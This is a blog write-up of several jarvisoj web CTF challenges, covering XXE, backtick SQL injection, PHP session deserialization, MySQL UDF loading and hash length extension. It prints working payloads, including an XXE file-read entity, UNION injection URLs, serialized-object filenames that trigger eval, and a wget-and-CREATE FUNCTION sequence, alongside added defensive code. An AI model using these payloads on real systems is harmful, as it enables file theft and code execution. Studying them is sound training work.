Notes on jarvisoj-web (the challenges I found interesting)

Home, writeup, ctf, web, 嘤嘤嘤 2018-07-18

  • Contents
  • XXE entity upload vulnerability
  • Backtick injection
  • PHP session deserialization injection
  • MySQL: loading a .so file
  • Hash length-extension attack

  • XXE entity upload vulnerability

Challenge link:

http://web.jarvisoj.com:9882/

Challenge source:

function XHR() {
    var xhr;
    try {xhr = new XMLHttpRequest();}
    catch(e) {
        var IEXHRVers = ["Msxml3.XMLHTTP","Msxml2.XMLHTTP","Microsoft.XMLHTTP"];
        for (var i=0,len=IEXHRVers.length;i< len;i++) {
            try {xhr = new ActiveXObject(IEXHRVers[i]);}
            catch(e) {continue;}
        }
    }
    return xhr;
}

function send(){
    evil_input = document.getElementById("evil-input").value;
    var xhr = XHR();
    xhr.open("post","/api/v1.0/try",true);
    xhr.onreadystatechange = function () {
        if (xhr.readyState==4 && xhr.status==201) {
            data = JSON.parse(xhr.responseText);
            tip_area = document.getElementById("tip-area");
            tip_area.value = data.task.search+data.task.value;
        }
    };
    xhr.setRequestHeader("Content-Type","application/json");
    xhr.send('{"search":"'+evil_input+'","value":"own"}');
}

The code is an AJAX asynchronous POST upload.
I only learned from the writeup that this is an XXE entity upload vulnerability.
I had not seen one before, so I am writing this post to record it.

First, enter an arbitrary value, 123.
The request obtained:

POST /api/v1.0/try HTTP/1.1
Host: web.jarvisoj.com:9882
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Referer: http://web.jarvisoj.com:9882/
Content-Length: 30
Cookie: UM_distinctid=1633abd2b6a7df-048c43202bcb36-1269624a-1fa400-1633abd2b6c1100
Connection: keep-alive

{"search":"123","value":"own"}

Response:

HTTP/1.0 201 CREATED
Content-Type: application/json
Content-Length: 80
Server: Werkzeug/0.9.4 Python/2.7.6
Date: Wed, 18 Jul 2018 08:17:06 GMT

{
  "task": {
    "done": false, 
    "search": "123", 
    "value": "own"
  }
}

Of course that has nothing to do with this challenge.
Since it is an XXE entity upload vulnerability, the first step is to change the request's Content-Type: application/json to Content-Type: application/xml.
In fact, any Content-Type other than application/json is enough for the read to succeed; the backend code should be fixed.
Next we need to construct an XML document.

First, the XML declaration:

<?xml version="1.0" ?>

The challenge hints that the goal is the flag in /home/ctf/flag.txt on the target machine.
So the contents of flag.txt can be read remotely by declaring an external entity.

<!DOCTYPE a [
    <!ENTITY b SYSTEM "/home/ctf/flag.txt">
]>

Complete XML:

<?xml version="1.0"?>
<!DOCTYPE a [
    <!ENTITY b SYSTEM "/home/ctf/flag.txt">
]>
<c>&b;</c>

Response:

<c>CTF{XxE_15_n0T_S7range_Enough}
</c>

Remediation:

PHP:

libxml_disable_entity_loader(true);

Java:

DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);

Python:

from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

Others:
XML External Entity (XXE) Prevention Cheat Sheet (OWASP)

Also filter keywords such as system, <!ENTITY and so on.
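As an added example (not code from the challenge or from this post), here is what the hardened backend from the remediation list could look like in Python using only the standard library: the /api/v1.0/try handler accepts nothing but application/json and fails closed otherwise, and a separate XML entry point refuses any document that carries a DTD, which is the only place an <!ENTITY ... SYSTEM> declaration can live. The endpoint path and field names come from the request above; the function names and the sample bodies are constructed for this example.

```python
import json
import xml.etree.ElementTree as ET


class RejectedRequest(ValueError):
    """Raised when a request body is refused before any data is processed."""


def parse_xml_strict(body: bytes) -> ET.Element:
    """Parse an XML body while refusing any document that declares a DTD.

    External entities can only be declared inside a DTD, so rejecting
    "<!DOCTYPE" before the parser runs removes the XXE surface regardless
    of how the parser itself is configured. The body must be UTF-8 so the
    keyword check cannot be dodged by sending the document in UTF-16.
    """
    try:
        text = body.decode("utf-8")
    except UnicodeDecodeError:
        raise RejectedRequest("XML body must be UTF-8")
    if "<!DOCTYPE" in text:          # XML keywords are case-sensitive
        raise RejectedRequest("DTD declarations are not accepted")
    return ET.fromstring(body)


def handle_try(content_type: str, body: bytes) -> dict:
    """Model of a /api/v1.0/try handler that only ever parses JSON.

    The challenge endpoint parsed XML for any non-JSON Content-Type; a
    hardened handler fails closed instead (HTTP 415 in a real server).
    """
    media_type = content_type.split(";", 1)[0].strip().lower()
    if media_type != "application/json":
        raise RejectedRequest("unsupported media type: %r" % content_type)
    try:
        data = json.loads(body.decode("utf-8"))
    except (UnicodeDecodeError, ValueError):
        raise RejectedRequest("body is not valid JSON")
    if not isinstance(data, dict) or not isinstance(data.get("search"), str):
        raise RejectedRequest("missing or malformed 'search' field")
    return {"task": {"done": False, "search": data["search"], "value": data.get("value")}}


# Constructed sample bodies (not captured from the challenge server).
JSON_BODY = b'{"search":"123","value":"own"}'
XXE_BODY = (
    b'<?xml version="1.0"?>\n'
    b'<!DOCTYPE a [\n'
    b'    <!ENTITY b SYSTEM "/home/ctf/flag.txt">\n'
    b']>\n'
    b'<c>&b;</c>'
)
PLAIN_XML_BODY = b'<?xml version="1.0"?><c>123</c>'


def rejected(func, *args) -> bool:
    """True if func(*args) raises RejectedRequest."""
    try:
        func(*args)
    except RejectedRequest:
        return True
    return False


if __name__ == "__main__":
    print(handle_try("application/json", JSON_BODY))
    print("XML with DTD rejected:", rejected(parse_xml_strict, XXE_BODY))
    print("XML Content-Type rejected:", rejected(handle_try, "application/xml", XXE_BODY))
    print("plain XML element text:", parse_xml_strict(PLAIN_XML_BODY).text)
```

One caveat on the Java line in the remediation list: `setExpandEntityReferences(false)` on its own does not stop external entities from being resolved; the OWASP cheat sheet linked above recommends `dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)` as the primary control, which is the same "no DTD at all" policy the Python above enforces.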


References:
Know the attack to know the defense: XXE vulnerability attack and defense (未知攻焉知防——XXE漏洞攻防)
XXE injection attack and defense (XXE注入攻击与防御)
[XXE] XXE vulnerability attack and defense (【XXE】XXE漏洞攻击与防御)


  • Backtick injection

Challenge link:

http://web.jarvisoj.com:32794/

Challenge source:

<?php
require("config.php");
$table = $_GET['table']?$_GET['table']:"test";
$table = Filter($table);
mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker();
$sql = "select 'flag{xxx}' from secret_{$table}";
$ret = sql_query($sql);
echo $ret[0];
?>

The challenge hints at the source.
Time to fire up the tools.
The source is available at index.php~.
The key code is:

mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker();
$sql = "select 'flag{xxx}' from secret_{$table}";

There is an injection here.
Backticks are used, so I looked them up on Baidu.

The difference between single quotes, double quotes and backticks in MySQL (MySQL中单引号、双引号和反引号的区别)

Local testing shows:

1.desc `aaa` `bbb`
2.desc aaa bbb
3.desc 'aaa' 'bbb'

1 and 2 have the same effect.
3 cannot be executed.

The statements above are equivalent to:

1.select * from user bbb where bbb.id = 1
2.select * from `user`  `bbb` where bbb.id = 1

So we can construct:

desc `test` `union select 1`

The second backtick-quoted token is taken as an alias, so the original query is effectively replaced by the statement that follows it and our own query gets executed. Only one result row is displayed, however, so we use LIMIT to skip to the row we want.


Database name: 61d300

http://web.jarvisoj.com:32794?table=test` `union select database() limit 1,2

Table names: secret_flag, secret_test

http://web.jarvisoj.com:32794?table=test` `union select group_concat(table_name) from information_schema.tables where table_schema=0x363164333030 limit 1,2

Column name: flagUwillNeverKnow

http://web.jarvisoj.com:32794?table=test` `union select group_concat(column_name) from information_schema.columns where table_name=0x7365637265745f666c6167 limit 1,2

Flag: flag{luckyGame~}

http://web.jarvisoj.com:32794?table=test` `union select flagUwillNeverKnow from secret_flag limit 1,2
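The Filter() function in the source is not shown, so as an added example (not the challenge's own code) here is the check that closes this injection: MySQL cannot bind an identifier as a prepared-statement parameter, so the table value has to be validated against a strict identifier pattern and an allow-list before it is interpolated into DESC and SELECT. The second half scans constructed access-log lines for requests whose table parameter would fail the same check, which is the signature a log rule or WAF would look for. ALLOWED_SUFFIXES, the log lines and the function names are assumptions for this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Table suffixes the page is allowed to query; constructed allow-list for this example.
ALLOWED_SUFFIXES = frozenset({"test"})

# Unquoted MySQL identifiers: letters, digits and underscore, at most 64 characters.
IDENTIFIER_RE = re.compile(r"^[A-Za-z0-9_]{1,64}$")


class BadTableName(ValueError):
    """The user-supplied table suffix failed validation."""


def secret_table_statements(user_table: str) -> tuple:
    """Return the (DESC, SELECT) statements, or raise if the suffix is not permitted.

    The value is validated twice: syntactically, so no backtick, space or
    other punctuation can reach the query, and semantically, so it can only
    name a table the application expects to exist.
    """
    if not IDENTIFIER_RE.match(user_table):
        raise BadTableName("not a bare identifier: %r" % user_table)
    if user_table not in ALLOWED_SUFFIXES:
        raise BadTableName("table suffix not on the allow-list: %r" % user_table)
    table = "secret_" + user_table
    return ("DESC `%s`" % table, "SELECT 'flag{xxx}' FROM `%s`" % table)


REQUEST_LINE_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def suspicious_table_requests(log_lines) -> list:
    """Scan access-log lines for a 'table' parameter that fails the identifier check."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_LINE_RE.search(line)
        if not match:
            continue
        # parse_qs percent-decodes, so the backticks and spaces become visible again
        query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        for value in query.get("table", []):
            if not IDENTIFIER_RE.match(value):
                hits.append({"line": number, "client": line.split(" ", 1)[0], "table": value})
    return hits


# Constructed access-log lines; the second carries the injected value from this writeup.
LOG_LINES = [
    '10.0.0.5 - - [18/Jul/2018:16:20:01 +0800] "GET /?table=test HTTP/1.1" 200 12',
    '10.0.0.9 - - [18/Jul/2018:16:21:44 +0800] "GET /?table=test%60%20%60union%20select%20database()%20limit%201,2 HTTP/1.1" 200 6',
]


if __name__ == "__main__":
    print(secret_table_statements("test"))
    for hit in suspicious_table_requests(LOG_LINES):
        print("line %(line)d from %(client)s: table=%(table)r" % hit)
```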

  • PHP session deserialization injection

Challenge link:

http://web.jarvisoj.com:32784/

Challenge source:

<?php
//A webshell is wait for you
ini_set('session.serialize_handler', 'php');
session_start();
class OowoO
{
    public $mdzz;
    function __construct()
    {
        $this->mdzz = 'phpinfo();';
    }
    
    function __destruct()
    {
        eval($this->mdzz);
    }
}
if(isset($_GET['phpinfo']))
{
    $m = new OowoO();
}
else
{
    highlight_string(file_get_contents('index.php'));
}
?>

The challenge hints at phpinfo, so try phpinfo.php.

http://web.jarvisoj.com:32784/phpinfo.php

This reveals the document root /opt/lampp/htdocs.
For PHP session deserialization see: An interesting summary of PHP deserialization (有趣的php反序列化总结)

First create a test.html locally:

<form action="http://web.jarvisoj.com:32784/" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
    <input type="file" name="file" />
    <input type="submit" />
</form>

The captured upload request is as follows:

-----------------------------306841150525235
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"

123
-----------------------------306841150525235
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream


-----------------------------306841150525235--

The filename field is where the payload goes.
First list the directory:

filename="|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:39:\"print_r(scandir(\"/opt/lampp/htdocs/\"));\";}"

Result:

Array
(
    [0] => .
    [1] => ..
    [2] => Here_1s_7he_fl4g_buT_You_Cannot_see.php
    [3] => index.php
    [4] => phpinfo.php
)

Here_1s_7he_fl4g_buT_You_Cannot_see.php is visible, so the flag is presumably in there; just view the file.

filename="|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:73:\"show_source(\"/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php\");\";}"

This gives the flag:
"CTF{4d96e37f4be998c50aa586de4ada354a}"
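To see exactly why the ini_set('session.serialize_handler', 'php') in this script matters when the global handler that writes the upload-progress record is php_serialize, here is an added Python example (not from the post or from PHP itself) with a minimal reader for PHP's serialize() format and the two session record layouts. The same bytes decode to a harmless string under php_serialize and to a constructed OowoO object under php, because the php handler treats everything before the first | as the key and unserializes whatever follows. The record below is a simplified constructed one (the real upload_progress entry nests the file name deeper) and the mdzz body is the class's own default, phpinfo();.

```python
# Minimal reader for PHP's serialize() format (N, i, b, s, a, O only; ASCII input
# assumed so that byte lengths equal character lengths). Constructed for this example.


def _unserialize_at(data: str, pos: int):
    """Decode one value starting at data[pos]; return (value, next_pos)."""
    tag = data[pos]
    if tag == "N":                                   # N;
        return None, pos + 2
    if tag in "ib":                                  # i:42;  b:1;
        end = data.index(";", pos)
        number = int(data[pos + 2:end])
        return (bool(number) if tag == "b" else number), end + 1
    if tag == "s":                                   # s:LEN:"bytes";
        colon = data.index(":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2
        value = data[start:start + length]           # length-prefixed, so quotes inside are fine
        if data[start + length:start + length + 2] != '";':
            raise ValueError("bad string terminator at offset %d" % pos)
        return value, start + length + 2
    if tag in "aO":                                  # a:N:{...}  O:LEN:"Class":N:{...}
        colon = data.index(":", pos + 2)
        if tag == "O":
            name_len = int(data[pos + 2:colon])
            class_name = data[colon + 2:colon + 2 + name_len]
            pos = colon + 2 + name_len + 2           # skip the closing '":'
            colon = data.index(":", pos)
            count = int(data[pos:colon])
            result = {"__class__": class_name}       # an object PHP would construct
        else:
            count = int(data[pos + 2:colon])
            result = {}
        pos = colon + 2                              # skip ':{'
        for _ in range(count):
            key, pos = _unserialize_at(data, pos)
            value, pos = _unserialize_at(data, pos)
            result[key] = value
        if data[pos] != "}":
            raise ValueError("expected '}' at offset %d" % pos)
        return result, pos + 1
    raise ValueError("unsupported type tag %r at offset %d" % (tag, pos))


def decode_php_serialize_handler(record: str):
    """session.serialize_handler = php_serialize: the record is one serialized array."""
    value, end = _unserialize_at(record, 0)
    if end != len(record):
        raise ValueError("trailing data after the session array")
    return value


def decode_php_handler(record: str) -> dict:
    """session.serialize_handler = php: the record is KEY|value KEY|value ...

    As in PHP, everything up to the first '|' is the key and whatever follows
    is unserialized; trailing bytes without a further '|' are ignored.
    """
    session = {}
    pos = 0
    while pos < len(record):
        bar = record.find("|", pos)
        if bar < 0:
            break
        key = record[pos:bar]
        session[key], pos = _unserialize_at(record, bar + 1)
    return session


def instantiated_classes(value) -> list:
    """Class names of every object that unserialize() would construct."""
    found = []
    if isinstance(value, dict):
        if "__class__" in value:
            found.append(value["__class__"])
        for child in value.values():
            found.extend(instantiated_classes(child))
    return found


# Constructed, simplified upload-progress record as written by the php_serialize handler.
INJECTED_NAME = '|O:5:"OowoO":1:{s:4:"mdzz";s:10:"phpinfo();";}'
RECORD = 'a:1:{s:4:"name";s:%d:"%s";}' % (len(INJECTED_NAME), INJECTED_NAME)


if __name__ == "__main__":
    print("php_serialize view:", decode_php_serialize_handler(RECORD))
    print("php view:          ", decode_php_handler(RECORD))
    print("objects created under php handler:", instantiated_classes(decode_php_handler(RECORD)))
```

Read with the handler that wrote it, the record never yields an object; the object only appears when the reader's handler differs from the writer's. The fixes follow from that: do not override session.serialize_handler per script, keep session.upload_progress.enabled off where it is not needed, and never put eval() in a __destruct() that attacker-shaped data can reach.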


  • MySQL: loading a .so file

Challenge link:

https://dn.jarvisoj.com/challengefiles/udf.so.02f8981200697e5eeb661e64797fc172


I was completely baffled when I first got this challenge; only after reading a writeup did I learn that this kind of trick exists?????
First, wget the file into the MySQL plugin directory.

usr/lib/mysql/plugin# wget https://dn.jarvisoj.com/challengefiles/udf.so.02f8981200697e5eeb661e64797fc172

The challenge hints at a help_me function, so create the help_me function.

mysql> create function help_me returns string soname 'udf.so.02f8981200697e5eeb661e64797fc172';

This returns the following.

mysql> select help_me();
+---------------------------------------------+
| help_me()                                   |
+---------------------------------------------+
| use getflag function to obtain your flag!!
 |
+---------------------------------------------+
1 row in set (0.00 sec)

It hints at getflag; same steps as above.

mysql> create function getflag returns string soname 'udf.so.02f8981200697e5eeb661e64797fc172';
Query OK, 0 rows affected (0.01 sec)

mysql> select getflag();
+------------------------------------------+
| getflag()                                |
+------------------------------------------+
| PCTF{Interesting_U5er_d3fined_Function}
 |
+------------------------------------------+
1 row in set (0.00 sec)
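Creating a UDF only needs a shared object that MySQL can find in plugin_dir plus the privilege to run CREATE FUNCTION, and the definitions persist in the mysql.func table, so that table and the plugin directory are what a defender should watch. As an added example (not part of the post), the Python below parses constructed mysql client output of SELECT name, dl FROM mysql.func using the library name from this challenge, flags any library that is not on an approved list, and checks a plugin directory for group or world write permission. The approved list, the sample output and the function names are assumptions for this example.

```python
import os
import stat
import tempfile

# Shared objects that are expected to back UDFs on this server; constructed (empty) here.
APPROVED_UDF_LIBRARIES = frozenset()


def parse_mysql_cli_table(output: str) -> list:
    """Parse the +----+ / | a | b | table layout printed by the mysql client into dicts."""
    rows = []
    header = None
    for line in output.splitlines():
        line = line.strip()
        if not line.startswith("|"):
            continue                                   # border lines such as +----+----+
        cells = [cell.strip() for cell in line.strip("|").split("|")]
        if header is None:
            header = cells                             # first data line is the column header
        else:
            rows.append(dict(zip(header, cells)))
    return rows


def audit_udf_table(func_rows: list, approved=APPROVED_UDF_LIBRARIES) -> list:
    """One finding per UDF whose shared object is not on the approved list."""
    findings = []
    for row in func_rows:
        if row["dl"] not in approved:
            findings.append("UDF %s is backed by unapproved library %s" % (row["name"], row["dl"]))
    return findings


def audit_plugin_dir(path: str) -> list:
    """Flag a plugin directory that anyone other than its owner can write into."""
    mode = os.stat(path).st_mode
    findings = []
    if mode & stat.S_IWGRP:
        findings.append("%s is group-writable" % path)
    if mode & stat.S_IWOTH:
        findings.append("%s is world-writable" % path)
    return findings


def writable_dir_check_demo() -> list:
    """Create a throwaway directory with loose permissions and audit it."""
    path = tempfile.mkdtemp()
    os.chmod(path, 0o777)
    try:
        return audit_plugin_dir(path)
    finally:
        os.rmdir(path)


# Constructed sample: what `SELECT name, dl FROM mysql.func;` shows after the two
# CREATE FUNCTION statements in this writeup.
SAMPLE_FUNC_OUTPUT = """\
+---------+------------------------------------------+
| name    | dl                                       |
+---------+------------------------------------------+
| help_me | udf.so.02f8981200697e5eeb661e64797fc172  |
| getflag | udf.so.02f8981200697e5eeb661e64797fc172  |
+---------+------------------------------------------+
"""


if __name__ == "__main__":
    rows = parse_mysql_cli_table(SAMPLE_FUNC_OUTPUT)
    for finding in audit_udf_table(rows) + writable_dir_check_demo():
        print(finding)
```

In practice the directory check runs against the value of SHOW VARIABLES LIKE 'plugin_dir' on the real server, and the mysql.func query is worth scheduling alongside a check that the MySQL service account cannot write to that directory at all.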

  • Hash length-extension attack

Challenge link:

http://web.jarvisoj.com:32778/

Challenge source:

<!DOCTYPE html>
<html>
<head>
<title>Web 350</title>
<style type="text/css">
        body {
                background:gray;
                text-align:center;
        }
</style>
</head>

<body>
        <?php
                $auth = false;
                $role = "guest";
                $salt =
                if (isset($_COOKIE["role"])) {
                        $role = unserialize($_COOKIE["role"]);
                        $hsh = $_COOKIE["hsh"];
                        if ($role==="admin" && $hsh === md5($salt.strrev($_COOKIE["role"]))) {
                                $auth = true;
                        } else {
                                $auth = false;
                        }
                } else {
                        $s = serialize($role);
                        setcookie('role',$s);
                        $hsh = md5($salt.strrev($s));
                        setcookie('hsh',$hsh);
                }
                if ($auth) {
                        echo "<h3>Welcome Admin. Your flag is
                } else {
                        echo "<h3>Only Admin can see the flag!!</h3>";
                }
        ?>

</body>
</html>
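The check in the source above, md5($salt.strrev($_COOKIE["role"])), is a secret-prefix hash used as a message authentication code, which is exactly the construction a hash length-extension attack targets, and it is combined with unserialize() on a cookie the client controls. As an added example (not code from the challenge), here is the replacement design in Python: HMAC-SHA256 over a JSON-encoded role, verified with a constant-time comparison. SERVER_KEY, the function names and the cookie layout are assumptions for this example.

```python
import hashlib
import hmac
import json
import secrets

# Constructed server-side key; a real deployment loads it from configuration.
SERVER_KEY = secrets.token_bytes(32)


def sign_role(role: str, key: bytes = SERVER_KEY) -> tuple:
    """Return (role_cookie, hsh_cookie).

    The role is stored as JSON rather than serialize(), so decoding it can
    never instantiate an object, and the tag is an HMAC rather than
    hash(secret || message), so it cannot be extended without the key.
    """
    role_cookie = json.dumps({"role": role}, separators=(",", ":"))
    tag = hmac.new(key, role_cookie.encode("utf-8"), hashlib.sha256).hexdigest()
    return role_cookie, tag


def verify_role(role_cookie: str, hsh: str, key: bytes = SERVER_KEY):
    """Return the role carried by a validly signed cookie, else None."""
    expected = hmac.new(key, role_cookie.encode("utf-8"), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, hsh):    # constant-time, unlike ===
        return None
    try:
        data = json.loads(role_cookie)
    except ValueError:
        return None
    role = data.get("role") if isinstance(data, dict) else None
    return role if isinstance(role, str) else None


def is_admin(role_cookie: str, hsh: str, key: bytes = SERVER_KEY) -> bool:
    """The authorization decision the page makes, with the tag checked first."""
    return verify_role(role_cookie, hsh, key) == "admin"


if __name__ == "__main__":
    cookie, tag = sign_role("guest")
    print("guest cookie:", cookie, tag)
    print("admin?", is_admin(cookie, tag))
    # Editing the cookie without the key invalidates the tag.
    print("forged admin?", is_admin(cookie.replace("guest", "admin"), tag))
```

The reason HMAC is the right replacement is structural: MD5 and SHA-2 process a message in blocks and their output is the internal state, so md5(secret || m) lets anyone who knows the length of secret continue the hash over extra data; HMAC hashes twice with the key mixed in on the outside, so the final state never appears in the tag. Signing the whole cookie value also removes the need for strrev() or any other ad hoc mixing.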


This article was written by saltyfishyu and is released under Creative Commons Attribution 3.0; it may be freely reproduced and quoted, provided the author is credited and the source is noted.
